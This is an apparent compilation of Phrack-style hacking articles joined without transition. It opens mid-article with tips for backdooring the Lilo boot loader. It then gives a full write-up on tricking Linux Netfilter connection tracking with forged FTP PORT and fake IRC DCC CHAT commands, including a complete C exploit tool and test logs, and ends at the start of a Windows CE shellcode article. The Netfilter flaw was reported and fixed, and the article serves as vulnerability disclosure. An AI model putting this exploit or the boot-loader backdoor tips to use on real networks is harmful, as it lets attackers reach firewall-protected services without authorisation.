    3) Check the file consistency of e2fs_stage1_5 and stage2.
    4) If not 3 (hey, are you a qualified sysadmin?),
        a) if you're suspicious about the kernel, dump it and make a
           byte-to-byte comparison with the kernel on disk. See [5] for
           more.
        b) if you're suspicious about a module, that's a hard challenge;
           maybe you can dump it and disassemble it?


--[ 6.0 - At the end


    Lilo is another boot loader, but it's file-system-insensitive, so Lilo
has no built-in file systems. It relies on /boot/bootsect.b and
/boot/map.b. So, if you're lazy, write a fake lilo.conf which displays
a.img but loads b.img. Or you can make lilo load a fake /boot/map.b. The
details are up to you. Do it!




Breaking through a Firewall using a forged FTP command

Table of Contents

  1 - Introduction
  2 - FTP, IRC and the stateful inspection of Netfilter
  3 - Attack Scenario I
    3.1 - First Trick
    3.2 - First Trick Details
  4 - Attack Scenario II - Non-standard command line
    4.1 - Second Trick Details
  5 - Attack Scenario III - 'echo' feature of FTP reply
    5.1 - Passive FTP: background information
    5.2 - Third Trick Details
  6 - APPENDIX I. A demonstration tool of the second trick
  7 - APPENDIX II. A demonstration example of the second attack trick.

--[ 1 - Introduction

    FTP is a protocol that uses two connections. One of them is called a
control connection and the other, a data connection. FTP commands and
replies are exchanged across the control connection, which lasts for the
whole FTP session. On the other hand, a file (or a list of files) is sent
across the data connection, which is newly established each time a file is
transferred.
    For network security, most firewalls do not usually allow any
connections to an FTP server except FTP control connections to the FTP
server port (TCP port 21 by default). However, while a file is being
transferred, they accept the data connection temporarily. To do this, a
firewall tracks the control connection state and detects the commands
related to file transfer. This is called stateful inspection.

    I've created three attack tricks that make a firewall allow an illegal
connection by deceiving its connection tracking using a forged FTP command.

    I actually tested them against Netfilter/IPTables, the firewall
installed by default in the Linux kernel 2.4 and 2.6. I confirmed that the
first trick worked in the Linux kernel 2.4.18 and that the second one (a
variant of the first) worked well in the Linux kernel 2.4.28 (a recent
version at the time of writing).
    This vulnerability was already reported to the Netfilter project team
and they fixed it in the Linux kernel 2.6.11.

--[ 2 - FTP, IRC and the stateful inspection of Netfilter

    First, let's examine FTP, IRC (you will later see why IRC is
mentioned) and the stateful inspection of Netfilter. If you are a master
of them, you can skip this chapter.

    As stated before, FTP uses a control connection in order to exchange
the commands and replies(, which are represented in ASCII) and, on the
contrary, uses a data connection for file transfer.

    For instance, when you command "ls" or "get <a file name>" at FTP
prompt, the FTP server(in active mode) actively initiates a data connection
to a TCP port number(called a data port) on the FTP client, your host. The
client, in advance, sends the data port number using a PORT command, one of
FTP commands.

The format of a PORT command is as follows.

    PORT h1,h2,h3,h4,p1,p2<CRLF>

    Here the character string "h1,h2,h3,h4" means the dotted-decimal IP
"h1.h2.h3.h4" of the client, and the string "p1,p2" encodes the data port
number (= p1 * 256 + p2). Each field of the address and port number is a
decimal number. The data port is dynamically assigned by the client. In
addition, commands and replies end with the <CRLF> character sequence.
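
    For instance, p1 = 26 and p2 = 11 encode data port 26 * 256 + 11 =
6667. A trivial sketch (the helper names are ours, purely for
illustration):

```c
#include <assert.h>

/* Decode the data port from the p1,p2 fields of a PORT command. */
static int ftp_data_port(int p1, int p2)
{
    return p1 * 256 + p2;
}

/* Split a port number back into the p1,p2 fields. */
static void ftp_port_fields(int port, int *p1, int *p2)
{
    *p1 = port / 256;   /* high byte */
    *p2 = port % 256;   /* low byte */
}
```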

    Netfilter tracks an FTP control connection and records the TCP
sequence number and the data length of a packet containing an FTP command
line (which ends with <LF>). It then computes the sequence number of the
next command packet based on this information. When a packet with that
sequence number arrives, Netfilter analyzes whether its data contains an
FTP command. If the head of the data matches "PORT" and the data ends with
<CRLF>, then Netfilter considers it a valid PORT command (the actual code
is a bit more complicated) and extracts an IP address and a port number
from it. Afterwards, Netfilter "expects" the server to actively initiate a
data connection to the specified port number on the client. When the data
connection request actually arrives, it accepts the connection, but only
while it is established. An incomplete command, called a "partial"
command, is dropped for the sake of accurate tracking.

    IRC (Internet Relay Chat) is an Internet chatting protocol. An IRC
client can use a direct connection in order to speak with another client.
When a client logs on, he/she connects to an IRC server (TCP port 6667 by
default). On the other hand, when the client wants to communicate with
another client directly, he/she establishes a direct connection to the
peer. To do this, the client sends a message called a DCC CHAT command in
advance. The command is analogous to an FTP PORT command. Netfilter tracks
IRC connections as well: it expects and accepts the direct chatting
connection.

--[ 3 - Attack Scenario I

----[ 3.1 - First Trick

    I have created a way to connect illegally to any TCP port on an FTP
server that Netfilter protects by deceiving the connection-tracking module
in the Linux kernel 2.4.18.

    In most cases, IPTables administrators make stateful packet filtering
rule(s) in order to accept some Internet services such as IRC direct
chatting and FTP file transfer. To do this, the administrators usually
insert the following rule into the IPTables rule list.

    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

    Suppose that a malicious user who logged on the FTP server transmits a
PORT command with TCP port number 6667(this is a default IRC server port
number) on the external network and then attempts to download a file from
the server.

    The FTP server actively initiates a data connection to the data port
6667 on the attacker's host. The firewall accepts this connection under the
stateful packet filtering rule stated before. Once the connection is
established, the connection-tracking module of the firewall(in the Linux
kernel 2.4.18) has the security flaw to mistake this for an IRC connection.
Thus the attacker's host can pretend to be an IRC server.

    If the attacker downloads a file comprised of a string that has the
same pattern as a DCC CHAT command, the connection-tracking module will
misinterpret the contents of a packet of the file transfer as a DCC CHAT
command.

    As a result, the firewall allows any host to connect to the TCP port
number, which is specified in the fake DCC CHAT command, on the fake IRC
client (i.e., the FTP server) according to the rule to accept the "related"
connection for IRC. For this, the attacker has to upload the file before
the intrusion.

    In conclusion, the attacker is able to illegally connect to any TCP
port on the FTP server.

----[ 3.2 - First Trick Details

    To describe this in detail, let's assume the network configuration is
as follows.

(a) A Netfilter/IPtables box protects an FTP server in a network. So users
    in the external network can connect only to the FTP server port on the
    FTP server. Permitted users can log on the server and download/upload
    files.

(b) Users in the protected network, including FTP server host, can connect
    only to IRC servers in the external network.

(c) While one of the internet services stated in (a) and (b) is
    established, the secondary connections(e.g., FTP data connection)
    related to the service can be accepted temporarily.

(d) Any other connections are blocked.

    To implement stateful inspection for IRC and FTP, the administrator
loads the IP connection tracking module ip_conntrack into the firewall,
along with ip_conntrack_ftp and ip_conntrack_irc, which track FTP and IRC
respectively. Ipt_state must also be loaded.

    Under the circumstances, an attacker can easily create a program that
logs on the FTP server and then makes the server actively initiate an FTP
data connection to an arbitrary TCP port on his/her host.

    Suppose that he/she transmits a PORT command with data port 6667 (i.e.,
default IRC server port).

An example is "PORT 192,168,100,100,26,11\r\n".

    The module ip_conntrack_ftp tracking this connection analyzes the PORT
command and "expects" the FTP server to issue an active open to the
specified port on the attacker's host.

    Afterwards, the attacker sends an FTP command to download a file,
"RETR <a file name>". The server tries to connect to port 6667 on the
attacker's host. Netfilter accepts the FTP data connection under the
stateful packet filtering rule.

    Once the connection is established, the module ip_conntrack mistakes
this for an IRC connection. Ip_conntrack regards the FTP server as an IRC
client and the attacker's host as an IRC server. If the fake IRC client
(i.e., the FTP server) transmits packets over the FTP data connection, the
module ip_conntrack_irc will try to find a DCC protocol message in them.

    The attacker can make the FTP server send the fake DCC CHAT command
using the following trick: before the intrusion, the attacker uploads a
file comprised of a string that has the same pattern as a DCC CHAT
command.

    To my knowledge, the form of a DCC CHAT command is as follows.

"\1DCC<a blank>CHAT<a blank>t<a blank><The decimal IP address of the IRC
client><blanks><The TCP port number of the IRC client>\1\n"

An example is "\1DCC CHAT t 3232236548    8000\1\n"

    In this case, Netfilter allows any host to do an active open to the TCP
port number on the IRC client specified in the line. The attacker can, of
course, arbitrarily specify the TCP port number in the fake DCC CHAT
command message.

    If a packet of this type is passed through the firewall, the module
ip_conntrack_irc mistakes this message for a DCC CHAT command and "expects"
any host to issue an active open to the specified TCP port number on the
FTP server for a direct chatting.

    As a result, Netfilter allows the attacker to connect to the port
number on the FTP server according to the stateful inspection rule.

    After all, the attacker can illegally connect to any TCP port on the
FTP server using this trick.

--[ 4 - Attack Scenario II - Non-standard command line

----[ 4.1. Second Trick Details

    Netfilter in the Linux kernel 2.4.20 (and later versions) has been
fixed so that a secondary connection (e.g., an FTP data connection)
accepted via a primary connection is not mistaken for that of any other
protocol. Thus the packet contents of an FTP data connection are no longer
parsed by the IRC connection-tracking module.

    However, I've created a way to connect illegally to any TCP port on an
FTP server that Netfilter protects by dodging connection tracking using a
nonstandard FTP command. As stated before, I confirmed that it worked in
the Linux kernel 2.4.28.

    Under the circumstances stated in the previous chapter, a malicious
user in the external network can easily create a program that logs on the
FTP server and transmits a nonstandard FTP command line.

    For instance, an attacker can transmit a PORT command without the
character <CR> at the end of the line; the command line ends with only
<LF>.

    An example is "PORT 192,168,100,100,26,11\n".

    On the contrary, a standard FTP command has <CRLF> sequence to denote
the end of a line.

    If the module ip_conntrack_ftp receives a nonstandard PORT command of
this type, it first detects a command and then looks for the character
<CR> while parsing. Because <CR> cannot be found, ip_conntrack_ftp regards
this as a "partial" command and drops the packet.
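
    The completeness check can be imitated loosely in C (this is an
illustration of the idea only, not Netfilter's actual code):

```c
#include <assert.h>
#include <string.h>

/* A standard FTP command line ends with "\r\n"; a line ending in a bare
   "\n" is what the tracker treats as a "partial" command. */
int is_complete_ftp_line(const char *line)
{
    size_t n = strlen(line);
    return n >= 2 && line[n - 2] == '\r' && line[n - 1] == '\n';
}
```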

    Just before this action, ip_conntrack_ftp anticipated the sequence
number of a packet that contains the next FTP command line and updated the
associated information. This number is calculated based on the TCP sequence
number and the data length of the "partial" PORT command packet.

    However, a TCP client usually retransmits the identical PORT command
packet afterwards, since the corresponding reply has not arrived. In this
case, ip_conntrack_ftp does NOT consider the retransmitted packet an FTP
command, because its sequence number differs from the anticipated sequence
number of the next FTP command. From the point of view of
ip_conntrack_ftp, the packet is at a "wrong" sequence number position.

    The module ip_conntrack_ftp just accepts the packet without analyzing
this command. The FTP server can eventually receive the retransmitted
packet from the attacker.

    Although ip_conntrack_ftp regards this "partial" command as INVALID,
some FTP servers such as wu-FTP and IIS FTP conversely consider this PORT
command without <CR> as VALID. In conclusion, the firewall, in this case,
fails to "expect" the FTP data connection.

    And when the attacker sends a RETR command to download a file from the
server, the server initiates to connect to the TCP port number, specified
in the partial PORT command, on the attacker's host.

    Suppose that the TCP port number is 6667(IRC server port), the firewall
accepts this connection under the stateless packet filtering rule that
allows IRC connections instead of the stateful filtering rule. So the IP
connection-tracking module mistakes the connection for IRC.

    The next steps of the attack are the same as those of the trick stated
in the previous chapter.

    In conclusion, the attacker is able to illegally connect to any TCP
port on the FTP server that the Netfilter firewall box protects.

*[supplement] There is a more refined method to dodge the
connection-tracking of Netfilter. It uses the default data port. When no
data port has been specified by a PORT command and a data connection needs
to be established, an FTP server does an active open from port 20 on the
server to the same (client-side) port number that is being used for the
control connection.

    To do this, the client has to listen on that local port in advance.
In addition, the client must bind the local port to 6667 (IRCD) and set
the socket option SO_REUSEADDR in order to reuse this port.

    Because a PORT command never passes through a Netfilter box, the
firewall can't anticipate the data connection. I confirmed that it worked
in the Linux kernel 2.4.20.
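The socket setup this supplement relies on can be sketched as follows. This is a minimal illustration, not the complete exploit: it only creates the control-connection socket bound to the IRCD port with SO_REUSEADDR set, so that a later listening socket can reuse the same port for the data connection. The helper name is mine, not from the original tool.

```c
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define IRCD_PORT 6667

/* Create a TCP socket bound to local port 6667 with SO_REUSEADDR set.
 * The caller would then connect() it to port 21 of the FTP server, so
 * that a default-data-port transfer from port 20 comes back to 6667. */
int bind_ircd_port(void)
{
    int fd, on = 1;
    struct sockaddr_in local;

    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        return -1;

    /* allow a second (listening) socket to reuse this port later */
    if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0) {
        close(fd);
        return -1;
    }

    memset(&local, 0, sizeof(local));
    local.sin_family = AF_INET;
    local.sin_port = htons(IRCD_PORT);
    local.sin_addr.s_addr = htonl(INADDR_ANY);

    if (bind(fd, (struct sockaddr *)&local, sizeof(local)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```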

** A demonstration tool and an example of this attack are described in
APPENDIX I and APPENDIX II, respectively.

--[ 5 - Attack Scenario III - 'echo' feature of FTP reply

----[ 5.1 - Passive FTP: background information

    An FTP server is able to do a passive open for a data connection as
well. This is called passive FTP. Conversely, FTP in which the server
does an active open is called active FTP.

    Just before a file transfer in passive mode, the client sends a PASV
command and the server replies with the corresponding message containing
a data port number. An example follows.

-> PASV\r\n
<- 227 Entering Passive Mode (192,168,20,20,42,125)\r\n

    Like a PORT command, the IP address and port number are separated by
commas. Meanwhile, when you enter a user name, the following command and
reply are exchanged.

-> USER <a user name>\r\n
<- 331 Password required for <the user name>.\r\n
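The six numbers in the 227 reply above encode the data endpoint: four address octets followed by two port bytes, with the port computed as p1*256 + p2. A minimal parser for that reply format, offered as a hypothetical illustration (it is not part of the original tooling):

```c
#include <stdio.h>
#include <string.h>

/* Parse an FTP "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply
 * into a dotted-quad address and a TCP port.
 * Returns 0 on success, -1 if the reply doesn't match the pattern. */
int parse_pasv_reply(const char *reply, char ip[16], unsigned short *port)
{
    unsigned int h1, h2, h3, h4, p1, p2;

    if (sscanf(reply, "227 Entering Passive Mode (%u,%u,%u,%u,%u,%u)",
               &h1, &h2, &h3, &h4, &p1, &p2) != 6)
        return -1;
    if (h1 > 255 || h2 > 255 || h3 > 255 || h4 > 255 ||
        p1 > 255 || p2 > 255)
        return -1;

    sprintf(ip, "%u.%u.%u.%u", h1, h2, h3, h4);
    *port = (unsigned short)(p1 * 256 + p2);   /* e.g. 42*256+125 = 10877 */
    return 0;
}
```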

----[ 5.2 - Third Trick Details

    Right after a user creates a connection to an FTP server, the server
usually requires a user name. When the client enters a login name at the
FTP prompt, a USER command is sent, and the same character sequence as
the user name is then returned as part of the corresponding reply, like
an echo. For example, when a user enters the string "Alice Lee" as a
login name at the FTP prompt, the following command line is sent across
the control connection.
-> USER Alice Lee\r\n

    The FTP server usually replies to it as follows.

<- 331 Password required for Alice Lee.\r\n

("Alice Lee" is echoed.)

Blanks may be included in a user name.

    A malicious user can insert an arbitrary pattern into the name. For
instance, when the same pattern as a passive FTP reply is inserted into
it, part of the echoed reply arrives looking like a reply related to
passive FTP.

-> USER 227 Entering Passive Mode (192,168,20,29,42,125)\r\n
<- 331 Password required for 227 Entering Passive Mode

    Does a firewall confuse it with a `real' passive FTP reply? Probably
most firewalls are not deceived by this trick, because the pattern sits
in the middle of the reply line.
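For illustration, the crafted login name from the example above could be assembled like this. The 9-byte padding string and the embedded address digits are hypothetical; in a real attack they must be tuned to the TCP window, as described next.

```c
#include <stdio.h>
#include <string.h>

/* Build a USER command whose "login name" embeds a fake 227 reply.
 * The padding is garbage used to adjust where the echoing reply will
 * be cut; its length here is purely illustrative. */
int build_fake_user(char *out, size_t outsz)
{
    const char *pad = "xxxxxxxxx";   /* length-tuning garbage */

    return snprintf(out, outsz,
        "USER %s227 Entering Passive Mode (192,168,20,29,42,125)\r\n",
        pad);
}
```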

    However, suppose that the TCP window size of the connection is
properly adjusted by the attacker when the connection is established;
then the contents can be divided in two, like two separate replies.

(A) ----->USER xxxxxxxxx227 Entering Passive Mode
(B) <-----331 Password required for xxxxxxxxx
(C) ----->ACK(with no data)
(D) <-----227 Entering Passive Mode (192,168,20,20,42,125).\r\n

(where the characters "xxxxx..." are inserted garbage used to adjust the
data length.)
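One way an attacker can influence the advertised window from userland is to shrink the socket receive buffer before connecting. The sketch below is only an approximation of the adjustment the split relies on: the kernel rounds SO_RCVBUF values, so byte-accurate window control generally needs raw sockets; the function name and the size 256 are mine, for illustration.

```c
#include <unistd.h>
#include <sys/socket.h>

/* Create a TCP socket with a deliberately small receive buffer, which
 * lowers the window this host advertises. Must be done before
 * connect() to affect the window offered during the handshake. */
int small_window_socket(int rcvbuf)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;

    if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF,
                   &rcvbuf, sizeof(rcvbuf)) < 0) {
        close(fd);
        return -1;
    }
    /* ... then connect() to port 21 and send the crafted USER line */
    return fd;
}
```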

    I actually tested it for Netfilter/IPTables. I confirmed that Netfilter
does not mistake the line (D) for a passive FTP reply at all.

The reason is as follows.

    (B) is not a complete line ending with <LF>. Netfilter therefore
never considers (D), the packet data following (B), to be the next reply.
As a result, the firewall doesn't try to parse (D).

    But, if there were a careless connection-tracking firewall, the attack
would work.

    In that case, the careless firewall would expect the client to do an
active open to the TCP port on the FTP server specified in the fake
reply. When the attacker initiates a connection to that target port on
the server, the firewall eventually accepts the illegal connection.

--[ 6 - APPENDIX I. A demonstration tool of the second trick

I wrote an exploit program in C and used the following compilation
command.

/>gcc -Wall -o fake_irc fake_irc.c

The source code is as follows.

USAGE : ./fake_irc <an FTP server IP> <a target port>
<a user name> <a password> <a file name to be downloaded>

- <an FTP server IP> : An FTP server IP that is a victim
- <a target port> : the target TCP port on the FTP server to which an
attacker wants to connect
- <a user name> : a user name used to log on the FTP server
- <a password> : a password used to log on the FTP server
- <a file name to be downloaded> : a file name to be downloaded from the
FTP server

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define BUF_SIZE 2048
#define DATA_BUF_SZ 65536
#define IRC_SERVER_PORT 6667
#define FTP_SERVER_PORT 21

static void usage(void)
{
 printf("USAGE : ./fake_irc "
 "<an FTP server IP> <a target port> <a user name> "
 "<a password> <a file name to be downloaded>\n");
}

void send_cmd(int fd, char *msg)
{
 if(send(fd, msg, strlen(msg), 0) < 0) {
  perror("send");
  exit(-1);
 }

 printf("--->%s\n", msg);
}

void get_reply(int fd)
{
 char read_buffer[BUF_SIZE];
 int size;

 //get the FTP server message
 if( (size = recv(fd, read_buffer, BUF_SIZE - 1, 0)) < 0) {
  perror("recv");
  exit(-1);
 }

 read_buffer[size] = '\0';

 printf("<---%s\n", read_buffer);
}

void cmd_reply_xchg(int fd, char *msg)
{
 send_cmd(fd, msg);
 get_reply(fd);
}

/*
argv[0] : a program name
argv[1] : an FTP server IP
argv[2] : a target port on the FTP server host
argv[3] : a user name
argv[4] : a password
argv[5] : a file name to be downloaded
*/
int main(int argc, char **argv)
{
 int fd, fd2, fd3, fd4;
 struct sockaddr_in serv_addr, serv_addr2;
 char send_buffer[BUF_SIZE];
 char *ftp_server_ip, *user_id, *pwd, *down_file;
 unsigned short target_port;
 char data_buf[DATA_BUF_SZ];
 struct sockaddr_in sa_cli;
 socklen_t client_len;
 unsigned int on = 1;
 unsigned char addr8[4];
 socklen_t datasize;

 if(argc != 6) {
  usage();
  return -1;
 }

 ftp_server_ip = argv[1];
 target_port = atoi(argv[2]);
 user_id = argv[3];
 pwd = argv[4];
 down_file = argv[5];

 if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 bzero(&serv_addr, sizeof(struct sockaddr_in));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(FTP_SERVER_PORT);
 serv_addr.sin_addr.s_addr = inet_addr(ftp_server_ip);

 //connect to the FTP server
 if(connect(fd, (struct sockaddr *) &serv_addr, sizeof(struct sockaddr))) {
  perror("connect");
  return -1;
 }

 //get the FTP server greeting message
 get_reply(fd);

 //exchange a USER command and the reply
 sprintf(send_buffer, "USER %s\r\n", user_id);
 cmd_reply_xchg(fd, send_buffer);

 //exchange a PASS command and the reply
 sprintf(send_buffer, "PASS %s\r\n", pwd);
 cmd_reply_xchg(fd, send_buffer);

 //exchange a SYST command and the reply
 sprintf(send_buffer, "SYST\r\n");
 cmd_reply_xchg(fd, send_buffer);

 //write a "partial" PORT command: <LF> only, deliberately no <CR>
 datasize = sizeof(serv_addr);

 if(getsockname(fd, (struct sockaddr *)&serv_addr, &datasize) < 0 ) {
  perror("getsockname");
  return -1;
 }

 memcpy(addr8, &serv_addr.sin_addr.s_addr, sizeof(addr8));

 sprintf(send_buffer, "PORT %hhu,%hhu,%hhu,%hhu,%hhu,%hhu\n",
  addr8[0], addr8[1], addr8[2], addr8[3],
  IRC_SERVER_PORT >> 8, IRC_SERVER_PORT & 0xff);

 cmd_reply_xchg(fd, send_buffer);

 //Be a server for an active FTP data connection
 if((fd2 = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 if(setsockopt(fd2, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0) {
  perror("setsockopt");
  return -1;
 }

 bzero(&serv_addr, sizeof(struct sockaddr_in));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(IRC_SERVER_PORT);
 serv_addr.sin_addr.s_addr = INADDR_ANY;

 if( bind(fd2, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0 ) {
  perror("bind");
  return -1;
 }

 if( listen(fd2, SOMAXCONN) < 0 ) {
  perror("listen");
  return -1;
 }

 //send a RETR command after calling listen()
 sprintf(send_buffer, "RETR %s\r\n", down_file);
 cmd_reply_xchg(fd, send_buffer);

 //accept the active FTP data connection request
 client_len = sizeof(sa_cli);
 bzero(&sa_cli, client_len);

 fd3 = accept(fd2, (struct sockaddr*) &sa_cli, &client_len);

 if( fd3 < 0 ) {
  perror("accept");
  return -1;
 }

 //get the fake DCC command
 bzero(data_buf, DATA_BUF_SZ);

 if( recv(fd3, data_buf, DATA_BUF_SZ, 0) < 0) {
  perror("recv");
  return -1;
 }

 ///Start of the attack
 if((fd4 = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 bzero(&serv_addr2, sizeof(struct sockaddr_in));
 serv_addr2.sin_family = AF_INET;
 serv_addr2.sin_port = htons(target_port);
 serv_addr2.sin_addr.s_addr = inet_addr(ftp_server_ip);

 if(connect(fd4, (struct sockaddr *)&serv_addr2, sizeof(struct sockaddr))) {
  perror("connect");
  return -1;
 }

 printf("\nConnected to the target port!!\n");

 //Here, communicate with the target port

 close(fd4);//close the attack connection
 /////////////The end of the attack.

 close(fd3);//close the FTP data connection

 //get the reply of FTP data transfer completion
 get_reply(fd);

 close(fd);//close the FTP control connection

 return 0;
}/*The end*/


--[ 7 - APPENDIX II. A demonstration example of the second attack trick

The following describes the environment in which I actually tested it.

In the figure below, the symbol "[]" stands for a computer.

[An attacker's host]-----[A firewall]-----[An FTP server]
(The network interfaces, eth1 and eth2 of the firewall are directly linked
to the attacker's host and server, respectively.)

    As shown in the above figure, packets transmitted between the FTP
client (i.e., the attacker) and the FTP server pass through the Linux box
running IPTables on Linux kernel 2.4.28.

The IP addresses assigned in each box are as follows.

(a) The attacker's host :
(b) eth1 port in the Linux box :
(c) The FTP server :
(d) eth2 port in the Linux box :

    A TCP server is listening on the FTP server's host address and port
8000.  The server on port 8000 is protected by IPTables. The attacker tried
to connect illegally to port 8000 on the FTP server in this demonstration.

    The records associated with this attack are presented below.

(1) The system configurations in the firewall, including the IPTables
    ruleset
(2) Tcpdump outputs on eth1 port of the firewall
(3) Tcpdump outputs on eth2 port of the firewall
(4) The file /proc/net/ip_conntrack data over time. It shows the
    information on the connections being tracked.
(5) DEBUGP(), printk messages for debug in the source
    files(ip_conntrack_core.c, ip_conntrack_ftp.c and ip_conntrack_irc.c).
    For the detailed messages, I activated the macro function DEBUGP() in
    the files.

    Since some characters of the messages are in Korean, they have been
deleted. I am sorry for this.


(1) The system configurations in the firewall

[root@hans root]# uname -a
Linux hans 2.4.28 #2 2004. 12. 25. () 16:02:51 KST i686 unknown

[root@hans root]# lsmod
Module                  Size  Used by    Not tainted
ip_conntrack_irc        5216   0  (unused)
ip_conntrack_ftp        6304   0  (unused)
ipt_state               1056   1  (autoclean)
ip_conntrack           40312   2  (autoclean) [ip_conntrack_irc
iptable_filter          2432   1  (autoclean)
ip_tables              16992   2  [ipt_state iptable_filter]
ext3                   64032   3  (autoclean)
jbd                    44800   3  (autoclean) [ext3]
usbcore                48576   0  (unused)

[root@hans root]# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy DROP)
target     prot opt source               destination
ACCEPT     tcp  --        tcp dpt:ftp
ACCEPT     tcp  --  anywhere             anywhere           tcp dpt:auth
ACCEPT     tcp  --        tcp dpt:ircd
ACCEPT     all  --  anywhere             anywhere           state

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

[root@hans root]# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use
Iface   U     0      0        0
eth2   U     0      0        0
eth1   U     0      0        0
eth0       U     0      0        0 lo


(2) Tcpdump outputs on eth1 port of the firewall

You can see that the "partial" PORT commands were transmitted and an
illegal connection to port 8000 was established.

tcpdump -nn -i eth1 -s 0 -X

    [ phrack staff: Output removed. Do it on your own. ]


(3) Tcpdump outputs on eth2 port of the firewall

Only one PORT command w/o <CR> is shown on eth2 port since the first one
was dropped.

tcpdump -nn -i eth2 -s 0 -X

    [ phrack staff: Output removed. Get skilled. Do it yourself! ]


(4) The file /proc/net/ip_conntrack data over time.

The file /proc/net/ip_conntrack shows the information on connections being
tracked. To that end, I executed the following shell command.

/>watch -n 1 "date >> /tmp/ipconn.txt; cat /proc/net/ip_conntrack >>
/tmp/ipconn.txt"

Note : Connections that are not associated with this test are seen from
time to time. I am sorry for this.

    [ phrack staff: Output removed. Use the force luke! ]

(5) dmesg outputs

->The following paragraph in the message shows that the first PORT command
w/o <CR> was regarded as "partial" and thus dropped.

Dec 31 15:03:40 hans kernel: find_pattern `PORT': dlen = 23
Dec 31 15:03:40 hans kernel: Pattern matches!
Dec 31 15:03:40 hans kernel: Skipped up to ` '!
Dec 31 15:03:40 hans kernel: Char 17 (got 5 nums) `10' unexpected
Dec 31 15:03:40 hans kernel: conntrack_ftp: partial PORT 1273167371+23

->The following paragraph shows that the second invalid PORT command w/o
<CR> was accepted because it was regarded as a packet with a wrong
sequence position (i.e., the packet was not regarded as an FTP command).

Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d7369080
Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23
Dec 31 15:03:40 hans kernel: conntrack_ftp: datalen 23 ends in \n
Dec 31 15:03:40 hans kernel: ip_conntrack_ftp_help: wrong seq pos

->The following shows that the connection-tracking module mistook the FTP
data connection for IRC.

Dec 31 15:03:40 hans kernel: ip_conntrack_in: new packet for d73691c0
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:Conntrackinfo = 2
Dec 31 15:03:40 hans kernel: Confirming conntrack d73691c0

->The following shows that ip_conntrack_irc mistook the packet contents of
the FTP data connection for a DCC CHAT command and "expected" the fake
chatting connection.

Dec 31 15:03:40 hans kernel: ip_conntrack_in: normal packet for d73691c0
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:entered
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC found in master
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC CHAT  detected
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:DCC bound ip/port:
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:tcph->seq = 3731565152
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:wrote info
seq=1613392874  (ofs=33), len=21
Dec 31 15:03:40 hans kernel: ip_conntrack_irc.c:help:expect_related
Dec 31 15:03:40 hans kernel: ip_conntrack_expect_related d73691c0
Dec 31 15:03:40 hans kernel: tuple: tuple d6c61d94: 6 ->
Dec 31 15:03:40 hans kernel: mask:  tuple d6c61da4: 65535 ->
Dec 31 15:03:40 hans kernel: new expectation d7cf82e0 of conntrack d73691c0

->The following shows that ip_conntrack, after all, accepted the illegal
connection to port 8000 under the stateful inspection rule.

Dec 31 15:03:40 hans kernel: conntrack: expectation arrives ct=d7369260
Dec 31 15:03:41 hans kernel: ip_conntrack_in: related packet for d7369260
Dec 31 15:03:41 hans kernel: Confirming conntrack d7369260
Dec 31 15:03:41 hans kernel: ip_conntrack_in: normal packet for d7369260

Hacking Windows CE (pocketpcs & others)

--[ 1 - Abstract

    The network features of PDAs and mobiles are becoming more and more
powerful, so their related security problems are attracting more and more
attention. This paper will show a buffer overflow exploitation example in
Windows CE. It will cover knowledge about the ARM architecture, memory
management and the features of processes and threads of Windows CE. It
also shows how to write a shellcode in Windows CE, including knowledge
about decoding shellcode of Windows CE with an ARM processor.

--[ 2 - Windows CE Overview

    Windows CE is a very popular embedded operating system for PDAs and
mobiles. As the name implies, it's developed by Microsoft. Because of the
similar APIs, Windows developers can easily develop applications for
Windows CE. Maybe this is an important reason that makes Windows CE
popular. Windows CE 5.0 is the latest version, but Windows is the most
useful version, and this paper is based on Windows

    For marketing reasons, Windows Mobile Software for Pocket PC and
Smartphone are considered independent products, but they are also based
on the core of Windows CE.

    By default, Windows CE is in little-endian mode and it supports
several processors.

--[ 3 - ARM Architecture

    The ARM processor is the most popular chip in PDAs and mobiles;
almost all embedded devices use ARM as the CPU. ARM processors are
typical RISC processors in that they implement a load/store architecture:
only load and store instructions can access memory, and data processing
instructions operate on register contents only.

    There are six major versions of the ARM architecture, denoted by the
version numbers 1 to 6.

    ARM processors support up to seven processor modes, depending on the
architecture version. These modes are: User, FIQ (Fast Interrupt
Request), IRQ (Interrupt Request), Supervisor, Abort, Undefined and
System. System mode requires ARM architecture v4 and above. All modes
except User mode are referred to as privileged modes.
    Applications usually execute in User mode, but on Pocket PC all
applications appear to run in kernel mode; we'll talk about this later.

    ARM processors have 37 registers, arranged in partially overlapping
banks. There is a different register bank for each processor mode. The
banked registers give rapid context switching for dealing with processor
exceptions and privileged operations.

